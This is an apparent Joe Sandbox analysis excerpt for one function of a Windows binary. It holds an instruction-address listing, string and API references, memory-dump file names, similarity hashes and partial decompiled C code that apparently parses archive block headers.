0x0102d0db
0x0102d0e3
0x0102d0e6
0x0102d0e9
0x0102d0ec
0x0102d0f2
0x0102d0fa
0x0102d100
0x0102d10a
0x0102d10a
0x0102d10d
0x0102d115
0x0102d11c
0x0102d11c
0x0102d10f
0x0102d10f
0x0102d111
0x0102d124
0x0102d12a
0x0102d12c
0x0102d130
0x0102d135
0x0102d142
0x0102d144
0x0102d14a
0x0102d14f
0x0102d150
0x0102d151
0x0102d15b
0x0102d160
0x0102d166
0x0102d16b
0x0102d174
0x0102d174
0x0102d176
0x0102d16d
0x0102d16d
0x0102d172
0x00000000
0x00000000
0x0102d172
0x0102d17c
0x0102d184
0x0102d186
0x0102d18f
0x0102d190
0x0102d196
0x0102d198
0x0102d58b
0x0102d591
0x0102d6b0
0x0102d6b0
0x0102d6b7
0x0102d6b7
0x0102d6b7
0x0102d6be
0x0102d6c1
0x0102d6c8
0x0102d6c8
0x0102d6c3
0x0102d6c3
0x0102d6c3
0x0102d6cc
0x0102d6cd
0x0102d6cf
0x0102d6d2
0x0102d6d5
0x0102d6d8
0x0102d6de
0x0102d6e1
0x0102d6e4
0x0102d6ee
0x0102d6ee
0x0102d6ee
0x0102d6e6
0x0102d6e6
0x0102d6e8
0x00000000
0x0102d6ea
0x0102d6ea
0x0102d6ea
0x0102d6e8
0x0102d6f0
0x0102d6f2
0x0102d793
0x0102d793
0x0102d7a0
0x0102d7a0
0x0102d7a0
0x0102d7a7
0x0102d7a9
0x0102d7b0
0x0102d7b5
0x0102d7b6
0x0102d7bb
0x0102d6f8
0x0102d6f8
0x0102d6fa
0x00000000
0x0102d700
0x0102d702
0x0102d703
0x0102d705
0x0102d707
0x0102d707
0x0102d709
0x0102d70c
0x0102d714
0x0102d716
0x0102d719
0x0102d71f
0x0102d71f
0x0102d721
0x0102d72d
0x0102d72d
0x0102d72d
0x0102d723
0x0102d725
0x0102d725
0x0102d734
0x0102d737
0x0102d739
0x0102d740
0x0102d740
0x0102d73b
0x0102d73b
0x0102d73b
0x0102d748
0x0102d752
0x0102d758
0x0102d759
0x0102d75e
0x0102d764
0x0102d767
0x00000000
0x00000000
0x0102d769
0x0102d769
0x0102d771
0x0102d771
0x0102d777
0x0102d77e
0x0102d78b
0x0102d780
0x0102d780
0x0102d783
0x0102d783
0x0102d77e
0x0102d6fa
0x0102d7c7
0x0102d7d7
0x0102d7e4
0x0102d7e6
0x0102d7ed
0x0102d597
0x0102d597
0x0102d5a0
0x0102d5a1
0x0102d5ab
0x0102d5b1
0x0102d5b3
0x0102d5b9
0x0102d5b9
0x0102d5bb
0x0102d5bb
0x0102d5c2
0x0102d5c9
0x00000000
0x00000000
0x0102d5cf
0x0102d5d2
0x0102d5d5
0x00000000
0x0102d5d7
0x0102d5d7
0x0102d5d7
0x0102d5d7
0x0102d5de
0x0102d5e1
0x0102d5e8
0x0102d5e8
0x0102d5e3
0x0102d5e3
0x0102d5e3
0x0102d5ec
0x0102d5ef
0x0102d5f1
0x0102d5f3
0x0102d5f9
0x0102d5ff
0x0102d601
0x0102d601
0x0102d601
0x0102d608
0x0102d608
0x0102d60a
0x0102d616
0x0102d616
0x0102d616
0x0102d60c
0x0102d60e
0x0102d60e
0x0102d61d
0x0102d620
0x0102d622
0x0102d629
0x0102d629
0x0102d624
0x0102d624
0x0102d624
0x0102d631
0x0102d63c
0x0102d642
0x0102d643
0x0102d648
0x0102d64e
0x0102d651
0x00000000
0x00000000
0x0102d653
0x0102d653
0x0102d65d
0x0102d668
0x0102d670
0x0102d676
0x0102d681
0x0102d687
0x0102d68e
0x0102d6a1
0x0102d6a8
0x0102d6a8
0x00000000
0x0102d5d5
0x0102d5bb
0x00000000
0x0102d5b3
0x0102d7f0
0x0102d7f0
0x0102d7f6
0x0102d7fb
0x0102d801
0x0102d801
0x0102d804
0x0102d80b
0x0102d812
0x0102d813
0x0102d814
0x0102d819
0x0102d19e
0x0102d19e
0x0102d1a7
0x0102d1a8
0x0102d1b2
0x0102d1b8
0x0102d1ba
0x0102d3c0
0x0102d3c8
0x0102d3cb
0x0102d3d0
0x0102d3d3
0x0102d3db
0x0102d3df
0x0102d3e5
0x0102d3eb
0x0102d3f0
0x0102d3f7
0x0102d3f8
0x0102d3f8
0x0102d3f8
0x0102d3ff
0x0102d402
0x0102d40a
0x0102d410
0x0102d415
0x0102d415
0x0102d412
0x0102d412
0x0102d412
0x0102d419
0x0102d41a
0x0102d41c
0x0102d41f
0x0102d425
0x0102d42b
0x0102d42e
0x0102d431
0x0102d437
0x0102d43a
0x0102d43d
0x0102d447
0x0102d447
0x0102d447
0x0102d43f
0x0102d43f
0x0102d441
0x00000000
0x0102d443
0x0102d443
0x0102d443
0x0102d441
0x0102d449
0x0102d44b
0x0102d53d
0x0102d53d
0x0102d53f
0x0102d544
0x0102d545
0x0102d54b
0x0102d557
0x0102d55e
0x0102d55f
0x0102d560
0x0102d565
0x0102d451
0x0102d451
0x0102d453
0x00000000
0x0102d459
0x0102d45b
0x0102d45c
0x0102d45e
0x0102d460
0x0102d462
0x0102d462
0x0102d468
0x0102d46a
0x0102d470
0x0102d473
0x0102d481
0x0102d487
0x0102d487
0x0102d489
0x0102d48c
0x0102d492
0x0102d492
0x0102d494
0x00000000
0x00000000
0x0102d496
0x0102d498
0x0102d49e
0x0102d49e
0x0102d49a
0x0102d49a
0x0102d49a
0x0102d4a3
0x0102d4a5
0x0102d4ac
0x0102d4ac
0x0102d4a7
0x0102d4a7
0x0102d4a7
0x0102d4d2
0x0102d4d8
0x0102d4db
0x0102d4e1
0x0102d4e8
0x0102d4e9
0x0102d4ea
0x0102d4f0
0x0102d4f3
0x0102d4f5
0x00000000
0x0102d4f5
0x00000000
0x0102d4f3
0x0102d4fd
0x0102d503
0x0102d50b
0x0102d50b
0x0102d50c
0x0102d50e
0x0102d512
0x0102d51a
0x0102d51a
0x0102d51a
0x0102d51c
0x0102d523
0x0102d528
0x0102d535
0x0102d52a
0x0102d52d
0x0102d52d
0x0102d528
0x0102d453
0x0102d568
0x0102d572
0x0102d578
0x0102d57e
0x0102d584
0x0102d1c0
0x0102d1c0
0x0102d1c0
0x0102d1c2
0x0102d1c9
0x0102d1d0
0x00000000
0x00000000
0x0102d1d6
0x0102d1d9
0x0102d1dc
0x00000000
0x0102d1de
0x0102d1e6
0x0102d1eb
0x0102d1f0
0x0102d1f1
0x0102d1f3
0x0102d1fb
0x0102d1ff
0x0102d205
0x0102d20b
0x0102d210
0x0102d217
0x0102d217
0x0102d218
0x0102d21b
0x0102d223
0x0102d229
0x0102d22e
0x0102d22e
0x0102d22b
0x0102d22b
0x0102d22b
0x0102d232
0x0102d233
0x0102d235
0x0102d238
0x0102d23e
0x0102d244
0x0102d247
0x0102d24a
0x0102d250
0x0102d253
0x0102d256
0x0102d260
0x0102d260
0x0102d260
0x0102d258
0x0102d258
0x0102d25a
0x00000000
0x0102d25c
0x0102d25c
0x0102d25c
0x0102d25a
0x0102d262
0x0102d264
0x0102d359
0x0102d359
0x0102d35b
0x0102d360
0x0102d361
0x0102d367
0x0102d373
0x0102d37a
0x0102d37b
0x0102d37c
0x0102d381
0x0102d26a
0x0102d26a
0x0102d26c
0x00000000
0x0102d272
0x0102d274
0x0102d275
0x0102d277
0x0102d279
0x0102d27b
0x0102d27b
0x0102d281
0x0102d283
0x0102d289
0x0102d28c
0x0102d29a
0x0102d2a0
0x0102d2a0
0x0102d2a2
0x0102d2a5
0x0102d2ab
0x0102d2ab
0x0102d2ad
0x00000000
0x00000000
0x0102d2af
0x0102d2b1
0x0102d2b7
0x0102d2b7
0x0102d2b3
0x0102d2b3
0x0102d2b3
0x0102d2bc
0x0102d2be
0x0102d2cb
0x0102d2cb
0x0102d2c0
0x0102d2c6
0x0102d2c6
0x0102d2e9
0x0102d2f1
0x0102d2f8
0x0102d2ff
0x0102d300
0x0102d303
0x0102d309
0x0102d30f
0x0102d312
0x0102d314
0x00000000
0x0102d314
0x00000000
0x0102d312
0x0102d31c
0x0102d322
0x0102d322
0x0102d328
0x0102d32a
0x0102d334
0x0102d336
0x0102d336
0x0102d336
0x0102d338
0x0102d33f
0x0102d344
0x0102d351
0x0102d346
0x0102d349
0x0102d349
0x0102d344
0x0102d26c
0x0102d384
0x0102d38f
0x0102d390
0x0102d391
0x0102d397
0x0102d39d
0x0102d3a3
0x0102d3a3
0x00000000
0x0102d1dc
0x00000000
0x0102d1c2
0x0102d3a4
0x0102d3aa
0x0102d3b1
0x0102d3b2
0x0102d3b3
0x0102d3b8
0x0102d3b8
0x0102d81c
0x0102d826
0x0102d827
0x0102d82d
0x0102d82f
0x0102dc98
0x0102dc9a
0x0102dc9c
0x0102dca2
0x0102dca4
0x0102dcaa
0x0102dcac
0x0102dffe
0x0102dffe
0x0102e000
0x0102e006
0x0102e00d
0x0102e013
0x0102e015
0x0102e0b3
0x0102e0b3
0x0102e0b5
0x0102e0b6
0x0102e0bc
0x00000000
0x0102e01b
0x0102e01b
0x0102e01e
0x0102e024
0x0102e02a
0x0102e02c
0x0102e032
0x0102e034
0x0102e034
0x0102e036
0x0102e036
0x0102e03f
0x0102e046
0x0102e04c
0x0102e04f
0x0102e050
0x0102e052
0x0102e052
0x0102e056
0x0102e058
0x0102e05a
0x0102e060
0x0102e063
0x00000000
0x0102e065
0x0102e065
0x0102e06c
0x0102e06c
0x0102e063
0x0102e058
0x0102e02c
0x0102e01e
0x0102e015
0x0102dcb2
0x0102dcb2
0x0102dcb2
0x0102dcb5
0x0102dcb9
0x0102dcb9
0x0102dcba
0x0102dccc
0x0102dcd9
0x0102dce8
0x0102dd12
0x0102dd17
0x0102dd1d
0x0102dd20
0x0102dd26
0x0102dd29
0x0102ddc2
0x0102ddc9
0x0102de47
0x0102de4d
0x0102de53
0x0102de56
0x0102de58
0x0102dee1
0x0102de5e
0x0102de5e
0x0102de64
0x0102de64
0x0102de6a
0x0102de70
0x0102de72
0x0102de74
0x0102de74
0x0102de7a
0x0102de80
0x0102de82
0x0102de8a
0x0102de8a
0x0102de90
0x0102de92
0x0102de94
0x0102de9a
0x0102de9c
0x0102dfb3
0x0102dfb5
0x0102dfbb
0x0102dfbb
0x0102dfbe
0x0102dfbf
0x00000000
0x0102dea2
0x0102dea8
0x0102dea8
0x0102deaa
0x0102deb0
0x0102deb3
0x0102deba
0x0102dec0
0x0102dec2
0x0102dee9
0x0102deeb
0x0102deed
0x0102deef
0x0102def5
0x0102defb
0x0102df95
0x0102df95
0x0102df98
0x00000000
0x0102df9e
0x0102df9e
0x0102dfa4
0x00000000
0x0102dfa4
0x0102df01
0x0102df01
0x0102df01
0x0102df04
0x00000000
0x00000000
0x0102df06
0x0102df08
0x0102df0a
0x0102df13
0x0102df13
0x0102df15
0x0102df1b
0x0102df1b
0x0102df27
0x0102df32
0x0102df35
0x0102df42
0x0102df45
0x0102df46
0x0102df47
0x0102df4d
0x0102df4f
0x0102df55
0x0102df5b
0x00000000
0x00000000
0x00000000
0x00000000
0x0102df5d
0x0102df5d
0x0102df5d
0x0102df5f
0x00000000
0x00000000
0x0102df61
0x0102df64
0x00000000
0x0102df6a
0x0102df6a
0x0102df6c
0x0102df6e
0x0102df6e
0x0102df6e
0x0102df76
0x0102df79
0x0102df79
0x0102df7f
0x0102df81
0x0102df83
0x0102df8a
0x0102df90
0x0102df92
0x00000000
0x0102df92
0x00000000
0x0102df64
0x00000000
0x0102df5d
0x00000000
0x0102df01
0x0102dec4
0x0102dec4
0x0102dec6
0x0102decc
0x0102ded3
0x0102ded3
0x0102ded6
0x0102ded6
0x00000000
0x0102dec6
0x00000000
0x0102dfaa
0x0102dfaa
0x0102dfab
0x0102dfab
0x00000000
0x0102deb0
0x0102ddcb
0x0102ddcb
0x0102ddd6
0x0102dddd
0x0102dde3
0x0102ddea
0x0102ddeb
0x0102ddec
0x0102ddf1
0x0102ddf4
0x0102ddf6
0x00000000
0x0102ddfc
0x0102ddfc
0x0102ddff
0x00000000
0x0102de05
0x0102de05
0x0102de0c
0x00000000
0x0102de12
0x0102de18
0x0102de1a
0x0102de20
0x0102de20
0x0102de22
0x0102de22
0x0102de24
0x0102de2d
0x0102de34
0x0102de37
0x0102de38
0x0102de3a
0x0102de3a
0x00000000
0x0102de42
0x0102de0c
0x0102ddff
0x0102ddf6
0x0102dd2f
0x0102dd2f
0x0102dd35
0x0102dd37
0x0102dd53
0x0102dd56
0x00000000
0x0102dd5c
0x0102dd5c
0x0102dd63
0x00000000
0x0102dd69
0x0102dd6f
0x0102dd71
0x0102dd77
0x0102dd77
0x0102dd79
0x0102dd79
0x0102dd7b
0x0102dd84
0x0102dd8b
0x0102dd8e
0x0102dd8f
0x0102dd91
0x0102dd91
0x0102dd99
0x0102dd99
0x0102dd9b
0x00000000
0x0102dda1
0x0102dda1
0x0102dda7
0x0102ddaa
0x0102e074
0x0102e076
0x0102e077
0x0102e07d
0x0102e089
0x0102e090
0x0102e091
0x0102e092
0x0102e097
0x0102e09a
0x0102ddb0
0x0102ddb0
0x0102ddb7
0x00000000
0x0102ddb7
0x0102ddaa
0x0102dd9b
0x0102dd63
0x0102dd39
0x0102dd39
0x0102dd3b
0x0102dd41
0x0102dd47
0x0102dd48
0x0102dfc5
0x0102dfc5
0x0102dfcc
0x0102dfcd
0x0102dfce
0x0102dfd3
0x0102dfd6
0x0102dfd6
0x0102dfd6
0x0102dd37
0x0102dfd8
0x0102dfd8
0x0102dfda
0x0102e0a1
0x0102e0a8
0x0102e0af
0x0102e0c2
0x0102e0c8
0x0102e0c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0102dfe0
0x0102dfe6
0x0102dfe6
0x0102dfec
0x0102dfec
0x0102dff8
0x00000000
0x0102dff8
0x0102d835
0x0102d835
0x0102d837
0x0102d83d
0x0102d83f
0x0102d845
0x0102d847
0x0102dbbe
0x0102dbbe
0x0102dbc0
0x0102dbc6
0x0102dbcd
0x0102dbcf
0x0102dc2e
0x0102dc31
0x0102dc37
0x0102dc3d
0x0102dc43
0x0102dc45
0x0102dc4b
0x0102dc4d
0x0102dc4d
0x0102dc4f
0x0102dc4f
0x0102dc51
0x0102dc5a
0x0102dc61
0x0102dc64
0x0102dc65
0x0102dc67
0x0102dc67
0x0102dc6f
0x0102dc71
0x0102dc77
0x0102dc7d
0x0102dc80
0x00000000
0x0102dc86
0x0102dc86
0x0102dc8d
0x0102dc8d
0x0102dc80
0x0102dc71
0x0102dc45
0x0102dbd1
0x0102dbd1
0x0102dbd3
0x0102dbd9
0x0102dbdf
0x00000000
0x0102dbdf
0x0102dbcf
0x0102d84d
0x0102d84d
0x0102d84d
0x0102d850
0x0102d854
0x0102d854
0x0102d855
0x0102d867
0x0102d874
0x0102d883
0x0102d8ad
0x0102d8b2
0x0102d8b8
0x0102d8bb
0x0102d8c1
0x0102d8c4
0x0102d940
0x0102d947
0x0102da0b
0x0102da11
0x0102da17
0x0102da1a
0x0102da1c
0x0102daa5
0x0102da22
0x0102da22
0x0102da28
0x0102da28
0x0102da2e
0x0102da34
0x0102da36
0x0102da38
0x0102da38
0x0102da3e
0x0102da44
0x0102da46
0x0102da4e
0x0102da4e
0x0102da54
0x0102da56
0x0102da58
0x0102da5e
0x0102da60
0x0102db77
0x0102db79
0x0102db7f
0x0102db7f
0x00000000
0x0102da66
0x0102da6c
0x0102da6c
0x0102da6e
0x0102da74
0x0102da77
0x0102da7e
0x0102da84
0x0102da86
0x0102daad
0x0102daaf
0x0102dab1
0x0102dab3
0x0102dab9
0x0102dabf
0x0102db59
0x0102db59
0x0102db5c
0x00000000
0x0102db62
0x0102db62
0x0102db68
0x00000000
0x0102db68
0x0102dac5
0x0102dac5
0x0102dac5
0x0102dac8
0x00000000
0x00000000
0x0102daca
0x0102dacc
0x0102dace
0x0102dad7
0x0102dad7
0x0102dad9
0x0102dadf
0x0102dadf
0x0102daeb
0x0102daf6
0x0102daf9
0x0102db06
0x0102db09
0x0102db0a
0x0102db0b
0x0102db11
0x0102db13
0x0102db19
0x0102db1f
0x00000000
0x00000000
0x00000000
0x00000000
0x0102db21
0x0102db21
0x0102db21
0x0102db23
0x00000000
0x00000000
0x0102db25
0x0102db28
0x0102dbe2
0x0102dbe2
0x0102dbe4
0x0102dbea
0x0102dbf0
0x0102dbf1
0x00000000
0x0102db2e
0x0102db2e
0x0102db30
0x0102db32
0x0102db32
0x0102db32
0x0102db3a
0x0102db3d
0x0102db3d
0x0102db43
0x0102db45
0x0102db47
0x0102db4e
0x0102db54
0x0102db56
0x00000000
0x0102db56
0x00000000
0x0102db28
0x00000000
0x0102db21
0x00000000
0x0102dac5
0x0102da88
0x0102da88
0x0102da8a
0x0102da90
0x0102da97
0x0102da97
0x0102da9a
0x0102da9a
0x00000000
0x0102da8a
0x00000000
0x0102db6e
0x0102db6e
0x0102db6f
0x0102db6f
0x00000000
0x0102da74
0x0102d94d
0x0102d94d
0x0102d958
0x0102d95f
0x0102d965
0x0102d96c
0x0102d96d
0x0102d96e
0x0102d973
0x0102d976
0x0102d978
0x0102d994
0x0102d997
0x00000000
0x0102d99d
0x0102d99d
0x0102d9a4
0x00000000
0x0102d9aa
0x0102d9b0
0x0102d9b2
0x0102d9b8
0x0102d9b8
0x0102d9ba
0x0102d9ba
0x0102d9bc
0x0102d9c5
0x0102d9cc
0x0102d9cf
0x0102d9d0
0x0102d9d2
0x0102d9d2
0x00000000
0x0102d9ba
0x0102d9a4
0x0102d97a
0x0102d97c
0x0102d982
0x0102d988
0x0102d989
0x00000000
0x0102d989
0x0102d978
0x0102d8c6
0x0102d8c6
0x0102d8cc
0x0102d8ce
0x0102d8e3
0x0102d8e6
0x00000000
0x0102d8ec
0x0102d8ec
0x0102d8f3
0x00000000
0x0102d8f9
0x0102d8ff
0x0102d901
0x0102d907
0x0102d907
0x0102d909
0x0102d909
0x0102d90b
0x0102d914
0x0102d91b
0x0102d91e
0x0102d91f
0x0102d921
0x0102d921
0x0102d9da
0x0102d9da
0x0102d9dc
0x00000000
0x0102d9e2
0x0102d9e2
0x0102d9e8
0x0102d9eb
0x0102d92e
0x0102d935
0x00000000
0x0102d9f1
0x0102d9f3
0x0102d9f9
0x0102d9ff
0x0102da00
0x0102dbf7
0x0102dbf7
0x0102dbfe
0x0102dbff
0x0102dc00
0x0102dc05
0x0102dc08
0x0102dc08
0x0102d9eb
0x0102d9dc
0x0102d8f3
0x0102d8d0
0x0102d8d0
0x0102d8d2
0x0102d8d8
0x0102db82
0x0102db82
0x0102db83
0x0102db89
0x0102db89
0x0102db90
0x0102db91
0x0102db92
0x0102db97
0x0102db9a
0x0102db9a
0x0102db9a
0x0102d8ce
0x0102db9c
0x0102db9c
0x0102db9e
0x0102dc0c
0x0102dc13
0x0102dc13
0x0102dc13
0x0102dc1a
0x0102dc1c
0x0102dc22
0x0102dc23
0x0102e0cf
0x0102e0cf
0x0102e0d0
0x0102e0d1
0x0102e0d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0102dba0
0x0102dba6
0x0102dba6
0x0102dbac
0x0102dbac
0x0102dbb8
0x00000000
0x0102dbb8
0x0102d847
0x0102e0d9
0x0102e0d9
0x0102e0df
0x0102e0e1
0x0102e0e7
0x0102e0ed
0x0102e0ef
0x0102e0f1
0x0102e0f3
0x0102e0f3
0x0102e0f5
0x0102e0f5
0x0102e0fe
0x0102e0ff
0x0102e103
0x0102e10a
0x0102e10d
0x0102e10e
0x0102e110
0x0102e110
0x0102e114
0x0102e11a
0x0102e11c
0x0102e122
0x0102e124
0x0102e12a
0x0102e12d
0x0102e140
0x0102e142
0x0102e143
0x0102e149
0x0102e155
0x0102e15c
0x0102e15d
0x0102e15e
0x0102e163
0x0102e12f
0x0102e131
0x0102e138
0x0102e138
0x0102e12d
0x0102e166
0x0102e166
0x0102e176
0x0102e17f
0x0102e180
0x0102e182
0x0102e219
0x0102e21b
0x0102e226
0x0102e226
0x0102e228
0x0102e22b
0x0102e22d
0x00000000
0x0102e21d
0x0102e223
0x0102e223
0x0102e188
0x0102e188
0x0102e18e
0x0102e191
0x0102e197
0x0102e19a
0x0102e1a0
0x0102e1a2
0x0102e1a8
0x0102e1aa
0x0102e1ac
0x0102e1ac
0x0102e1ae
0x0102e1ae
0x0102e1bb
0x0102e1c2
0x0102e1c5
0x0102e1c6
0x0102e1c8
0x0102e1c9
0x0102e1c9
0x0102e1cd
0x0102e1d3
0x0102e1d5
0x0102e1d7
0x0102e1dd
0x0102e1e0
0x0102e1f3
0x0102e1f4
0x0102e1fa
0x0102e206
0x0102e20d
0x0102e20e
0x0102e20f
0x0102e214
0x0102e1e2
0x0102e1e2
0x0102e1e9
0x0102e1e9
0x0102e1e0
0x0102e1d5
0x0102e233
0x0102e233
0x0102e233
0x0102e23f
0x0102e242
0x0102e248
0x0102e24a
0x0102e24c
0x0102e252
0x0102e254
0x0102e254
0x0102e254
0x0102e252
0x0102e259
0x0102e25a
0x0102e25c
0x0102e25e
0x0102e25e
0x0102e260
0x0102e266
0x0102e26c
0x0102e26e
0x0102e274
0x0102e274
0x0102e27a
0x0102e27c
0x00000000
0x00000000
0x0102e282
0x0102e284
0x0102e286
0x0102e286
0x0102e288
0x0102e288
0x0102e298
0x0102e29f
0x0102e2a2
0x0102e2a3
0x0102e2a5
0x0102e2a5
0x0102e2a9
0x0102e2af
0x0102e2b1
0x0102e2b3
0x0102e2b9
0x0102e2bc
0x0102e2cd
0x0102e2cf
0x0102e2d0
0x0102e2d6
0x0102e2e2
0x0102e2e9
0x0102e2ea
0x0102e2eb
0x0102e2f0
0x0102e2be
0x0102e2be
0x0102e2c5
0x0102e2c5
0x0102e2bc
0x0102e301
0x0102e310
0x0102e311
0x0102e311
0x0102e313
0x0102e315
0x0102e315
0x0102e31b
0x0102e31e
0x0102e320
0x0102e322
0x0102e322
0x0102e325
0x0102e326
0x0102e326
0x0102e32b
0x0102e32e
0x0102e332
0x0102e332
0x0102e333
0x0102e335
0x0102e33b
0x0102e341
0x00000000
0x00000000
0x00000000
0x0102e341
0x0102e274
0x0102e347
0x0102e347
0x00000000
0x0102e347
0x0102d0cc
0x0102d0c3
0x0102d0ba
0x0102d071
0x0102d075
0x0102d07d
0x00000000
0x0102d07f
0x0102d085
0x0102d08a
0x0102e366
0x0102e366
0x0102e369
0x0102e374
0x0102e39f
0x0102e3a0
0x0102e3a1
0x0102e3a2
0x0102e3a3
0x0102e3a4
0x0102e3a9
0x0102e3ac
0x0102e3af
0x0102e3b0
0x0102e3b3
0x0102e3b5
0x0102e3bb
0x0102e3be
0x0102e3c0
0x0102e3d5
0x0102e3d6
0x0102e3d9
0x0102e3db
0x0102e3f1
0x0102e3f7
0x0102e3ff
0x0102e401
0x0102e40c
0x0102e40f
0x0102e426
0x0102e411
0x0102e411
0x0102e416
0x00000000
0x0102e416
0x0102e403
0x0102e403
0x0102e408
0x0102e418
0x0102e418
0x0102e419
0x0102e41b
0x0102e420
0x0102e420
0x0102e3dd
0x0102e3dd
0x0102e3e0
0x00000000
0x0102e3e2
0x0102e3e5
0x0102e3ed
0x0102e3ed
0x0102e3e0
0x0102e3c2
0x0102e3c2
0x0102e3c9
0x0102e3ca
0x0102e3cc
0x0102e3d1
0x0102e3d1
0x0102e3b7
0x0102e3b7
0x0102e3b7
0x0102e42a
0x0102e376
0x0102e376
0x0102e376
0x0102e380
0x0102e389
0x0102e38e
0x0102e39c
0x0102e39c
0x0102e374
0x0102d07d

APIs

__floor_pentium4.LIBCMT ref: 0102D154

Strings

1#SNAN, xrefs: 0102E353
1#INF, xrefs: 0102E361
1#IND, xrefs: 0102E34C
1#QNAN, xrefs: 0102E35A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ee110ca4e6349cbd680ac9b31c87304f39b6ac31c197e12e64d016d82b82edce
Instruction ID: 76ed9ff0d5c6e4bc756ef65cda662eca13eed10ec78fba0b71e464aac4ae633f
Opcode Fuzzy Hash: ee110ca4e6349cbd680ac9b31c87304f39b6ac31c197e12e64d016d82b82edce
Instruction Fuzzy Hash: 9AC25A72E082298FDB65CE68DD447E9B7F5EB84305F1441EAD98DE7240E778AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 010027E8, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E010027E8(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t334;
				signed int _t338;
				char _t357;
				signed short _t364;
				signed int _t369;
				signed int _t376;
				signed char _t379;
				signed char _t382;
				char _t399;
				signed int _t400;
				signed int _t404;
				signed char _t418;
				intOrPtr _t419;
				char _t420;
				signed int _t423;
				signed int _t424;
				signed char _t429;
				signed int _t432;
				signed int _t436;
				signed short _t441;
				signed short _t446;
				unsigned int _t451;
				signed int _t454;
				void* _t457;
				signed int _t459;
				signed int _t462;
				void* _t469;
				signed int _t475;
				unsigned int _t480;
				void* _t481;
				void* _t488;
				void* _t489;
				signed char _t495;
				signed int _t509;
				intOrPtr* _t523;
				signed int _t526;
				signed int _t527;
				intOrPtr* _t528;
				signed int _t536;
				signed int _t541;
				signed int _t543;
				unsigned int _t552;
				signed int _t554;
				signed int _t567;
				signed char _t569;
				signed int _t570;
				void* _t593;
				signed int _t597;
				signed int _t609;
				signed int _t611;
				signed int _t613;
				unsigned int _t620;
				signed char _t636;
				signed char _t647;
				signed int _t650;
				unsigned int _t651;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				signed int _t658;
				unsigned int _t660;
				signed int _t664;
				void* _t665;
				void* _t672;
				signed int _t675;
				signed int _t676;
				signed char _t677;
				signed int _t680;
				void* _t682;
				signed int _t688;
				signed int _t689;
				void* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t705;
				signed int _t706;
				intOrPtr _t709;
				void* _t710;
				signed char _t719;

				_t528 = __ecx;
				E0101E28C(E01031CEF, _t710);
				E0101E360();
				_t523 = _t528;
				 *((intOrPtr*)(_t710 + 0x20)) = _t523;
				E0100C565(_t710 + 0x24, _t523);
				 *((intOrPtr*)(_t710 + 0x1c)) = 0;
				 *((intOrPtr*)(_t710 - 4)) = 0;
				_t664 = 7;
				if( *(_t523 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t710 + 0x5f)) = 0;
					L7:
					_push(_t664);
					E0100C770();
					if( *((intOrPtr*)(_t710 + 0x3c)) != 0) {
						 *(_t523 + 0x21e4) = E0100C5AB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f4) = 0;
						_t688 = E0100C593(_t710 + 0x24) & 0x000000ff;
						_t334 = E0100C5AB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21ec) = _t334;
						 *(_t523 + 0x21f4) = _t334 >> 0x0000000e & 0x00000001;
						_t536 = E0100C5AB(_t710 + 0x24) & 0x0000ffff;
						 *(_t523 + 0x21f0) = _t536;
						 *(_t523 + 0x21e8) = _t688;
						__eflags = _t536 - _t664;
						if(_t536 >= _t664) {
							_t689 = _t688 - 0x73;
							__eflags = _t689;
							if(_t689 == 0) {
								 *(_t523 + 0x21e8) = 1;
							} else {
								_t705 = _t689 - 1;
								__eflags = _t705;
								if(_t705 == 0) {
									 *(_t523 + 0x21e8) = 2;
								} else {
									_t706 = _t705 - 6;
									__eflags = _t706;
									if(_t706 == 0) {
										 *(_t523 + 0x21e8) = 3;
									} else {
										__eflags = _t706 == 1;
										if(_t706 == 1) {
											 *(_t523 + 0x21e8) = 5;
										}
									}
								}
							}
							_t338 =  *(_t523 + 0x21e8);
							 *(_t523 + 0x21dc) = _t338;
							__eflags = _t338 - 0x75;
							if(_t338 != 0x75) {
								__eflags = _t338 - 1;
								if(_t338 != 1) {
									L23:
									_push(_t536 - 7);
									L24:
									E0100C770();
									 *((intOrPtr*)(_t523 + 0x6ca8)) =  *((intOrPtr*)(_t523 + 0x6ca0)) + E01001924(_t523,  *(_t523 + 0x21f0));
									_t541 =  *(_t523 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t523 + 0x6cac) =  *(_t523 + 0x6ca4);
									 *(_t710 + 0x50) = _t541;
									__eflags = _t541 - 1;
									if(__eflags == 0) {
										_t665 = _t523 + 0x2208;
										E0100ACCC(_t665);
										_t543 = 5;
										memcpy(_t665, _t523 + 0x21e4, _t543 << 2);
										 *(_t523 + 0x221c) = E0100C5AB(_t710 + 0x24);
										_t647 = E0100C5E0(_t710 + 0x24);
										 *(_t523 + 0x2220) = _t647;
										 *(_t523 + 0x6cb5) =  *(_t523 + 0x2210) & 0x00000001;
										 *(_t523 + 0x6cb4) =  *(_t523 + 0x2210) >> 0x00000003 & 0x00000001;
										_t552 =  *(_t523 + 0x2210);
										 *(_t523 + 0x6cb7) = _t552 >> 0x00000002 & 0x00000001;
